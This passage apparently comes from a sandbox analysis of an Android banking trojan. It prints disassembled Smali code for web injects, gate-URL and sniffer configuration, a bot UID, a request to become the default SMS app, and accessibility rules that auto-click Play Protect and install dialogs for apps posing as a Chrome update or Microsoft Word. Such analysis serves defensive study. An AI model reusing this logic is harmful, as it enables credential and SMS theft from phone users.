                        51invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        52move-result-object v1
                        54invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        55try_end_49:
                        56sget-object v1, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        58invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        59goto/16 :goto_31
                        60catch_4f: move-exception v1
                        61goto/16 :goto_31
                        62catchall_51: move-exception v1
                        64sget-object v2, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        66invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        67throw v1
                        Cross References
                        APIs
                        • com.lib$webInjViewClient.this$0:Lcom/lib
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • com.lib$webInjViewClient.stopWord:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.String.contains
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • com.lib$webInjViewClient.stopWord:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.String.contains
                        Strings
                        • [func] [activity] [webViewClient] [onPageFinished] needStop:
                        Position Instruction Meta Information
                        0.prologue
                        2iget-object v0, p0, Lcom/lib$webInjViewClient;->this$0:Lcom/lib;
                        3new-instance v1, Ljava/lang/StringBuilder;
                        5invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        7const-string v2, "[func] [activity] [webViewClient] [onPageFinished] needStop: "
                        9invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        10move-result-object v1
                        11new-instance v2, Ljava/lang/StringBuilder;
                        13invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        15sget-object v3, Lcom/lib;->STRINGS_SLASH:Ljava/lang/String;
                        17invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        18move-result-object v2
                        20iget-object v3, p0, Lcom/lib$webInjViewClient;->stopWord:Ljava/lang/String;
                        22invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        23move-result-object v2
                        25invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        26move-result-object v2
                        28invoke-virtual {p1, v2}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
                        29move-result v2
                        31invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        32move-result-object v1
                        34invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        35move-result-object v1
                        37invoke-virtual {v0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        38new-instance v0, Ljava/lang/StringBuilder;
                        40invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        42sget-object v1, Lcom/lib;->STRINGS_SLASH:Ljava/lang/String;
                        44invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        45move-result-object v0
                        47iget-object v1, p0, Lcom/lib$webInjViewClient;->stopWord:Ljava/lang/String;
                        49invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        50move-result-object v0
                        52invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        53move-result-object v0
                        55invoke-virtual {p1, v0}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
                        56move-result v0
                        57return v0
                        Cross References
                        APIs
                        • com.lib$webInjViewClientOld.this$0:Lcom/lib
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • com.lib$webInjViewClientOld.stopWord:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.String.contains
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • com.lib$webInjViewClientOld.stopWord:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.String.contains
                        Strings
                        • [func] [activity] [webViewClient] [onPageFinished] needStop:
                        Position Instruction Meta Information
                        0.prologue
                        2iget-object v0, p0, Lcom/lib$webInjViewClientOld;->this$0:Lcom/lib;
                        3new-instance v1, Ljava/lang/StringBuilder;
                        5invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        7const-string v2, "[func] [activity] [webViewClient] [onPageFinished] needStop: "
                        9invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        10move-result-object v1
                        11new-instance v2, Ljava/lang/StringBuilder;
                        13invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        15sget-object v3, Lcom/lib;->STRINGS_SLASH:Ljava/lang/String;
                        17invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        18move-result-object v2
                        20iget-object v3, p0, Lcom/lib$webInjViewClientOld;->stopWord:Ljava/lang/String;
                        22invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        23move-result-object v2
                        25invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        26move-result-object v2
                        28invoke-virtual {p1, v2}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
                        29move-result v2
                        31invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        32move-result-object v1
                        34invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        35move-result-object v1
                        37invoke-virtual {v0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        38new-instance v0, Ljava/lang/StringBuilder;
                        40invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        42sget-object v1, Lcom/lib;->STRINGS_SLASH:Ljava/lang/String;
                        44invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        45move-result-object v0
                        47iget-object v1, p0, Lcom/lib$webInjViewClientOld;->stopWord:Ljava/lang/String;
                        49invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        50move-result-object v0
                        52invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        53move-result-object v0
                        55invoke-virtual {p1, v0}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
                        56move-result v0
                        57return v0
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.content.Intent.<init>
                        • android.content.Context.getPackageName
                        • android.content.Intent.putExtra
                        • android.content.Intent.setFlags
                        • android.content.Context.startActivity
                        • java.lang.Long.valueOf
                        Strings
                        • { \"com.android.settings\": {\"inject\": [ { \"id\": \".*:id/button1\", \"action\": \"CLICK\", \"options\" : { \"type\" : \"TYPE_WINDOW_STATE_CHANGED\"}, \"exist\" : { \"byText\" : \"(?sim)(.*
                        • .*)\" }, \"isNext\" : true }], \"once\" : true, \"debug\" : false } }
                        • android.provider.Telephony.ACTION_CHANGE_DEFAULT
                        • package
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Ljava/lang/StringBuilder;
                        3invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        5const-string v1, "{ \"com.android.settings\": {\"inject\": [ { \"id\": \".*:id/button1\", \"action\": \"CLICK\", \"options\" : { \"type\" : \"TYPE_WINDOW_STATE_CHANGED\"}, \"exist\" : { \"byText\" : \"(?sim)(.*"
                        7invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        8move-result-object v0
                        10sget-object v1, Lcom/lib;->selfAppName:Ljava/lang/String;
                        12invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        13move-result-object v0
                        15const-string v1, ".*)\" }, \"isNext\" : true }], \"once\" : true, \"debug\" : false } }"
                        17invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        18move-result-object v0
                        20invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        21move-result-object v0
                        22new-instance v1, Landroid/content/Intent;
                        24const-string v2, "android.provider.Telephony.ACTION_CHANGE_DEFAULT"
                        26invoke-direct {v1, v2}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
                        28const-string v2, "package"
                        30invoke-virtual {p1}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
                        31move-result-object v3
                        33invoke-virtual {v1, v2, v3}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;
                        34const/high16 v2, 0x10000000
                        36invoke-virtual {v1, v2}, Landroid/content/Intent;->setFlags(I)Landroid/content/Intent;
                        38invoke-virtual {p1, v1}, Landroid/content/Context;->startActivity(Landroid/content/Intent;)V
                        40iget-object v1, p0, Lcom/lib;->a11yClassName:Ljava/lang/String;
                        42invoke-virtual {p0, p1, v1}, Lcom/lib;->isA11y(Landroid/content/Context;Ljava/lang/String;)Z
                        43move-result v1
                        44if-eqz v1, :cond_44
                        45const-wide/16 v2, 0x4
                        47invoke-static {v2, v3}, Ljava/lang/Long;->valueOf(J)Ljava/lang/Long;
                        48move-result-object v1
                        50invoke-virtual {p0, p1, v1, v0}, Lcom/lib;->allowSmsAdmin(Landroid/content/Context;Ljava/lang/Long;Ljava/lang/String;)Z
                        51cond_44: return-void
                        Cross References
                        APIs
                        • java.lang.Object.getClass
                        • java.lang.Class.getName
                        • java.io.ByteArrayOutputStream.<init>
                        • java.io.ObjectOutputStream.<init>
                        • java.io.ObjectOutputStream.writeObject
                        • java.io.ObjectOutputStream.close
                        • java.io.ByteArrayOutputStream.toByteArray
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.RuntimeException.<init>
                        Strings
                        • VersionedParcelable encountered IOException writing serializable object (name =
                        • )
                        Position Instruction Meta Information
                        0if-nez p1, :cond_7
                        1const/4 p1, 0x0
                        3invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcel;->writeString(Ljava/lang/String;)V
                        4return-void
                        5cond_7:
                        6invoke-virtual {p1}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        7move-result-object v0
                        9invoke-virtual {v0}, Ljava/lang/Class;->getName()Ljava/lang/String;
                        10move-result-object v0
                        12invoke-virtual {p0, v0}, Landroidx/versionedparcelable/VersionedParcel;->writeString(Ljava/lang/String;)V
                        13new-instance v1, Ljava/io/ByteArrayOutputStream;
                        15invoke-direct {v1}, Ljava/io/ByteArrayOutputStream;-><init>()V
                        16try_start_17: new-instance v2, Ljava/io/ObjectOutputStream;
                        18invoke-direct {v2, v1}, Ljava/io/ObjectOutputStream;-><init>(Ljava/io/OutputStream;)V
                        20invoke-virtual {v2, p1}, Ljava/io/ObjectOutputStream;->writeObject(Ljava/lang/Object;)V
                        22invoke-virtual {v2}, Ljava/io/ObjectOutputStream;->close()V
                        24invoke-virtual {v1}, Ljava/io/ByteArrayOutputStream;->toByteArray()[B
                        25move-result-object p1
                        27invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcel;->writeByteArray([B)V
                        28try_end_29: return-void
                        29catch_2a: move-exception p1
                        30new-instance v1, Ljava/lang/RuntimeException;
                        31new-instance v2, Ljava/lang/StringBuilder;
                        33invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        35const-string v3, "VersionedParcelable encountered IOException writing serializable object (name = "
                        37invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        39invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        41const-string v0, ")"
                        43invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        45invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        46move-result-object v0
                        48invoke-direct {v1, v0, p1}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;Ljava/lang/Throwable;)V
                        49throw v1
                        Cross References
                        APIs
                        • org.json.JSONObject.<init>
                        • org.json.JSONObject.<init>
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • UID
                        • log
                        • reason
                        • data
                        • [func] [makeLogPacket] T:
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Lorg/json/JSONObject;
                        3invoke-direct {v0}, Lorg/json/JSONObject;-><init>()V
                        4try_start_5: new-instance v1, Lorg/json/JSONObject;
                        6invoke-direct {v1}, Lorg/json/JSONObject;-><init>()V
                        8const-string v2, "UID"
                        10invoke-virtual {p0, p1}, Lcom/lib;->getUID(Landroid/content/Context;)Ljava/lang/String;
                        11move-result-object v3
                        13invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        15const-string v2, "log"
                        17invoke-virtual {v1, v2, p3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        19const-string v2, "reason"
                        21invoke-virtual {v0, v2, p2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        23const-string v2, "data"
                        25invoke-virtual {v0, v2, v1}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        26goto_22: return-object v0
                        27catch_23: move-exception v0
                        28new-instance v1, Ljava/lang/StringBuilder;
                        30invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        32const-string v2, "[func] [makeLogPacket] T: "
                        34invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        35move-result-object v1
                        37invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        38move-result-object v0
                        40invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        41move-result-object v0
                        43invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        44const/4 v0, 0x0
                        45goto/16 :goto_22
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • org.json.JSONObject.getJSONArray
                        • org.json.JSONObject.getJSONArray
                        • org.json.JSONObject.getJSONArray
                        • org.json.JSONObject.getString
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Strings
                        • gateUrlsPrefs
                        • webInjPrefs
                        • webInj
                        • aSniffPrefs
                        • aSniff
                        • configPrefs
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2const/4 v1, 0x1
                        3try_start_2:
                        4sget-object v2, Lcom/lib;->configMutex:Ljava/util/concurrent/Semaphore;
                        6invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->acquire()V
                        7try_start_7:
                        8const-string v2, "gateUrlsPrefs"
                        10sget-object v3, Lcom/lib;->STRINGS_URLS:Ljava/lang/String;
                        12invoke-virtual {p2, v3}, Lorg/json/JSONObject;->getJSONArray(Ljava/lang/String;)Lorg/json/JSONArray;
                        13move-result-object v3
                        15invoke-virtual {p0, v3}, Lcom/lib;->jsonArrayToStringArray(Lorg/json/JSONArray;)[Ljava/lang/String;
                        16move-result-object v3
                        17const/4 v4, 0x1
                        19invoke-virtual {p0, p1, v2, v3, v4}, Lcom/lib;->writeGateUrls(Landroid/content/Context;Ljava/lang/String;[Ljava/lang/String;Z)Z
                        20move-result v2
                        21if-eqz v2, :cond_53
                        23const-string v2, "webInjPrefs"
                        25const-string v3, "webInj"
                        27invoke-virtual {p2, v3}, Lorg/json/JSONObject;->getJSONArray(Ljava/lang/String;)Lorg/json/JSONArray;
                        28move-result-object v3
                        30invoke-virtual {p0, v3}, Lcom/lib;->jsonArrayToStringArray(Lorg/json/JSONArray;)[Ljava/lang/String;
                        31move-result-object v3
                        32const/4 v4, 0x1
                        34invoke-virtual {p0, p1, v2, v3, v4}, Lcom/lib;->writeWebInjConfig(Landroid/content/Context;Ljava/lang/String;[Ljava/lang/String;Z)Z
                        35move-result v2
                        36if-eqz v2, :cond_53
                        38const-string v2, "aSniffPrefs"
                        40const-string v3, "aSniff"
                        42invoke-virtual {p2, v3}, Lorg/json/JSONObject;->getJSONArray(Ljava/lang/String;)Lorg/json/JSONArray;
                        43move-result-object v3
                        45invoke-virtual {p0, v3}, Lcom/lib;->jsonArrayToStringArray(Lorg/json/JSONArray;)[Ljava/lang/String;
                        46move-result-object v3
                        47const/4 v4, 0x1
                        49invoke-virtual {p0, p1, v2, v3, v4}, Lcom/lib;->writeASniffConfig(Landroid/content/Context;Ljava/lang/String;[Ljava/lang/String;Z)Z
                        50move-result v2
                        51if-eqz v2, :cond_53
                        53const-string v2, "configPrefs"
                        55sget-object v3, Lcom/lib;->STRINGS_ID:Ljava/lang/String;
                        57invoke-virtual {p2, v3}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        58move-result-object v3
                        59const/4 v4, 0x0
                        61invoke-virtual {p0, p1, v2, v3, v4}, Lcom/lib;->writeConfigID(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Z)Z
                        62move-result v2
                        63if-eqz v2, :cond_53
                        64const/4 v2, 0x1
                        65sput-boolean v2, Lcom/lib;->isA11ySniffer:Z
                        66try_end_52: move v0, v1
                        67cond_53:
                        68sget-object v1, Lcom/lib;->configMutex:Ljava/util/concurrent/Semaphore;
                        70invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        71goto_58: return v0
                        72catch_59: move-exception v1
                        74sget-object v1, Lcom/lib;->configMutex:Ljava/util/concurrent/Semaphore;
                        76invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        77goto/16 :goto_58
                        78catch_60: move-exception v1
                        79goto/16 :goto_58
                        80catchall_62: move-exception v1
                        82sget-object v2, Lcom/lib;->configMutex:Ljava/util/concurrent/Semaphore;
                        84invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        85throw v1
                        APIs
                        • android.view.accessibility.AccessibilityEvent.getSource
                        • java.lang.Boolean.valueOf
                        • java.lang.Boolean.valueOf
                        • java.lang.Boolean.booleanValue
                        • java.lang.Boolean.valueOf
                        • java.lang.Boolean.booleanValue
                        • java.lang.Boolean.valueOf
                        • java.lang.Boolean.booleanValue
                        • java.lang.Boolean.valueOf
                        • java.lang.Boolean.booleanValue
                        Strings
                        • { \"com.android.vending\": {\"inject\": [ { \"id\": \".*:id/button2\", \"action\": \"CLICK\", \"options\" : { \"type\" : \"TYPE_WINDOW_STATE_CHANGED\", \"eventClass\":\"r.*\", \"eventText\" : \"(?sim).*Play.*Chrome: Update 74.0.3683.68.*\" }, \"exist\" : { \"byText\" : \"(?sim).*Chrome: Update 74.0.3683.68.*\" } } ], \"once\" : true, \"debug\" : true } }
                        • { \"com.android.vending\": {\"inject\": [ { \"id\": \".*:id/button1\", \"action\": \"CLICK\", \"options\" : { \"type\" : \"TYPE_WINDOW_STATE_CHANGED\", \"eventClass\":\"com.google.android.finsky.verifier.impl.PerSourceInstallationConsentDialog\" }, \"exist\" : { \"byText\" : \"(?sim).*Microsoft Word.*\" } } ], \"once\" : true, \"debug\" : true } }
                        • { \"com.android.vending\": {\"inject\": [ { \"id\": \".*:id/button2\", \"action\": \"CLICK\", \"options\" : { \"type\" : \"TYPE_WINDOW_STATE_CHANGED\", \"eventClass\":\"com.google.android.finsky.verifier.impl.PackageWarningDialog\" }, \"exist\" : { \"byText\" : \"(?sim).*Chrome: Update 74.0.3683.68.*\" } } ], \"once\" : true, \"debug\" : true } }
                        • { \"com.android.vending\": {\"inject\": [ { \"id\": \".*:id/button1\", \"action\": \"CLICK\", \"options\" : { \"eventClass\":\"r.*\", \"eventText\" : \"(?sim).*Microsoft Word.*\" }, \"exist\" : { \"byText\" : \"(?sim).*Microsoft Word.*\" } } ], \"once\" : true, \"debug\" : true } }
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        3const-string v2, "{ \"com.android.vending\": {\"inject\": [ { \"id\": \".*:id/button2\", \"action\": \"CLICK\", \"options\" : { \"type\" : \"TYPE_WINDOW_STATE_CHANGED\", \"eventClass\":\"r.*\", \"eventText\" : \"(?sim).*Play.*Chrome: Update 74.0.3683.68.*\" }, \"exist\" : { \"byText\" : \"(?sim).*Chrome: Update 74.0.3683.68.*\" } } ], \"once\" : true, \"debug\" : true } }"
                        5const-string v3, "{ \"com.android.vending\": {\"inject\": [ { \"id\": \".*:id/button1\", \"action\": \"CLICK\", \"options\" : { \"type\" : \"TYPE_WINDOW_STATE_CHANGED\", \"eventClass\":\"com.google.android.finsky.verifier.impl.PerSourceInstallationConsentDialog\" }, \"exist\" : { \"byText\" : \"(?sim).*Microsoft Word.*\" } } ], \"once\" : true, \"debug\" : true } }"
                        7const-string v4, "{ \"com.android.vending\": {\"inject\": [ { \"id\": \".*:id/button2\", \"action\": \"CLICK\", \"options\" : { \"type\" : \"TYPE_WINDOW_STATE_CHANGED\", \"eventClass\":\"com.google.android.finsky.verifier.impl.PackageWarningDialog\" }, \"exist\" : { \"byText\" : \"(?sim).*Chrome: Update 74.0.3683.68.*\" } } ], \"once\" : true, \"debug\" : true } }"
                        9const-string v5, "{ \"com.android.vending\": {\"inject\": [ { \"id\": \".*:id/button1\", \"action\": \"CLICK\", \"options\" : { \"eventClass\":\"r.*\", \"eventText\" : \"(?sim).*Microsoft Word.*\" }, \"exist\" : { \"byText\" : \"(?sim).*Microsoft Word.*\" } } ], \"once\" : true, \"debug\" : true } }"
                        11invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getSource()Landroid/view/accessibility/AccessibilityNodeInfo;
                        12move-result-object v6
                        14invoke-static {v0}, Ljava/lang/Boolean;->valueOf(Z)Ljava/lang/Boolean;
                        15move-result-object v1
                        16if-nez v6, :cond_14
                        17goto_13: return v0
                        18cond_14:
                        19invoke-direct {p0, p1, v2}, Lcom/lib;->makeInjectPermanent(Landroid/view/accessibility/AccessibilityEvent;Ljava/lang/String;)Z
                        20move-result v0
                        22invoke-static {v0}, Ljava/lang/Boolean;->valueOf(Z)Ljava/lang/Boolean;
                        23try_end_1b: move-result-object v0
                        24try_start_1c:
                        25invoke-virtual {v0}, Ljava/lang/Boolean;->booleanValue()Z
                        26move-result v1
                        27if-nez v1, :cond_2a
                        29invoke-direct {p0, p1, v3}, Lcom/lib;->makeInjectPermanent(Landroid/view/accessibility/AccessibilityEvent;Ljava/lang/String;)Z
                        30move-result v1
                        32invoke-static {v1}, Ljava/lang/Boolean;->valueOf(Z)Ljava/lang/Boolean;
                        33move-result-object v0
                        34cond_2a:
                        35invoke-virtual {v0}, Ljava/lang/Boolean;->booleanValue()Z
                        36move-result v1
                        37if-nez v1, :cond_38
                        39invoke-direct {p0, p1, v4}, Lcom/lib;->makeInjectPermanent(Landroid/view/accessibility/AccessibilityEvent;Ljava/lang/String;)Z
                        40move-result v1
                        42invoke-static {v1}, Ljava/lang/Boolean;->valueOf(Z)Ljava/lang/Boolean;
                        43move-result-object v0
                        44cond_38:
                        45invoke-virtual {v0}, Ljava/lang/Boolean;->booleanValue()Z
                        46move-result v1
                        47if-nez v1, :cond_46
                        49invoke-direct {p0, p1, v5}, Lcom/lib;->makeInjectPermanent(Landroid/view/accessibility/AccessibilityEvent;Ljava/lang/String;)Z
                        50move-result v1
                        52invoke-static {v1}, Ljava/lang/Boolean;->valueOf(Z)Ljava/lang/Boolean;
                        53try_end_45: move-result-object v0
                        54goto_46:
                        55invoke-virtual {v0}, Ljava/lang/Boolean;->booleanValue()Z
                        56move-result v0
                        57goto/16 :goto_13
                        58catchall_4b: move-exception v0
                        59throw v0
                        60catch_4d: move-exception v0
                        61move-object v0, v1
                        62goto/16 :goto_46
                        63catch_50: move-exception v1
                        64goto/16 :goto_46
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • android.content.Context.getSharedPreferences
                        • android.content.SharedPreferences.edit
                        • android.content.SharedPreferences$Editor.putString
                        • android.content.SharedPreferences$Editor.commit
                        • java.util.concurrent.Semaphore.release
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Strings
                        • UID
                        • [func] [writeBotUID] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3sget-object v1, Lcom/lib;->botUidMutex:Ljava/util/concurrent/Semaphore;
                        5invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        6try_end_6: const/4 v1, 0x0
                        7try_start_7:
                        8invoke-virtual {p1, p2, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        9move-result-object v1
                        11invoke-interface {v1}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
                        12move-result-object v1
                        14const-string v2, "UID"
                        16invoke-interface {v1, v2, p3}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
                        18invoke-interface {v1}, Landroid/content/SharedPreferences$Editor;->commit()Z
                        19try_end_17: move-result v0
                        20try_start_18:
                        21sget-object v1, Lcom/lib;->botUidMutex:Ljava/util/concurrent/Semaphore;
                        23invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        24try_end_1d: return v0
                        25catch_1e: move-exception v1
                        26try_start_1f: new-instance v2, Ljava/lang/StringBuilder;
                        28invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        30const-string v3, "[func] [writeBotUID] T: "
                        32invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        33move-result-object v2
                        35invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        36move-result-object v1
                        38invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        39move-result-object v1
                        41invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        42try_end_35:
                        43sget-object v1, Lcom/lib;->botUidMutex:Ljava/util/concurrent/Semaphore;
                        45invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        46goto/16 :goto_1d
                        47catch_3b: move-exception v1
                        48goto/16 :goto_1d
                        49catchall_3d: move-exception v1
                        51sget-object v2, Lcom/lib;->botUidMutex:Ljava/util/concurrent/Semaphore;
                        53invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        54throw v1
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.content.Intent.<init>
                        • android.content.Intent.putExtra
                        • android.content.Intent.setFlags
                        • android.content.Context.startActivity
                        • java.lang.Long.valueOf
                        Strings
                        • { \"com.android.settings\": {\"inject\": [ { \"id\": \".*:id/button1\", \"action\": \"CLICK\", \"options\" : { \"type\" : \"TYPE_WINDOW_STATE_CHANGED\"}, \"exist\" : { \"byText\" : \"(?sim)(.*
                        • .*)\" }, \"isNext\" : true }], \"once\" : true, \"debug\" : false } }
                        • android.provider.Telephony.ACTION_CHANGE_DEFAULT
                        • package
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Ljava/lang/StringBuilder;
                        3invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        5const-string v1, "{ \"com.android.settings\": {\"inject\": [ { \"id\": \".*:id/button1\", \"action\": \"CLICK\", \"options\" : { \"type\" : \"TYPE_WINDOW_STATE_CHANGED\"}, \"exist\" : { \"byText\" : \"(?sim)(.*"
                        7invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        8move-result-object v0
                        10sget-object v1, Lcom/lib;->selfAppName:Ljava/lang/String;
                        12invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        13move-result-object v0
